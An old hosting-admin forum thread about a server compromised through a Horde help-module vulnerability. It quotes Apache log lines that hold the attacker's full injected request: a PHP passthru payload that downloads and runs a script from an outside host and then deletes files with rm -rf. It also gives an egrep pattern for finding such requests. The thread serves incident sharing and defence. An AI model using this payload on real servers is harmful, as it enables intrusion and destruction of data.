Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Security Update: HORDER Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster

    stugster Well-Known Member

    Joined:
    Apr 16, 2002
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    306
    Location:
    Edinburgh, UK
    cPanel Access Level:
    Root Administrator
    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
     
  2. netlook

    netlook Well-Known Member

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    166
    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
     
  3. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    166
    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde. Which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -

    [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice